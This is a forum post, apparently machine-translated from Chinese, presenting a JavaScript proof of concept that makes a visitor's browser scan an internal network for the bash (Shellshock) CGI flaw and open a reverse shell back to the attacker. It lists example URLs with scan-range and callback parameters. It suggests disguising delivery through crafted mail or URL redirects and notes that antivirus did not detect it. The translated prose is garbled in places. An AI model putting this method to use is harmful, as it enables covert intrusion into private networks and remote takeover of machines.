Come t00ls a few days, also have no time to write original. --(I started the toast.) )
Recently saw a foreigner an article, feel very good.
Test a bit of this thing to share the process to the guys, hope that everyone do not step on, busy these days to write original
Call a JS, scan the intranet for bash vulnerabilities, and then bounce back a small thing from the shell. Apt should be used.
Test process:
A POC from a foreigner my intranet build test
Listen to the local 250 port first.
And then after the build, visit
1 |
http://192.168.1.9/test.html?s=192.168.1.1&e3=1&e4=20&d=192.168.1.8/250 |
The first parameter s is the end value of the IP start E3 e4 that is used to start the IP in the beginning of the scan and the C segment. (because I test locally, so the parameters are set relatively short, you can play by yourself)
1 |
http://192.168.1.9/test.html?s=192.168.1.1&e3=255&e4=255&d=192.168.1.8/250 |
We look at the URL of this example, the script will send an HTTP request to 192.168.1.1. It will then proactively request 192.168.1.2,192.168.1.3,192.168.2.1,192.168.2.2 and so on.
Until it reaches 192.168.255.255.
The last parameter, D 192.168.1.8/250, is the back-link IP and port. (192.168.1.8 me this machine)
From here you can see that you have visited
1 |
http://192.168.1.9/test.html?s=192.168.1.1&e3=1&e4=20&d=192.168.1.8/250 |
After the request
1 |
http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js |
This JS
After starting the intranet scan, 192.168.1.1----192.168.1.20 and accesses the CGI path set inside the POC, directly bouncing the shell test.
The actual application situation can be carefully structured mail, url jump, etc., disguise themselves.
The authors say tested windows, MAC, IE, FF, Chrome, and Safari. Can rebound, my local Norton, 360 also no alarm, the author said Symantec alarm.
Finally attached POC, local tyrants friends to reward a few bi bar, a lot of posts can not see, if there are not understand the friend in the following reply Oh.
JS detects if there is a bash vulnerability in the Intranet, rebound shell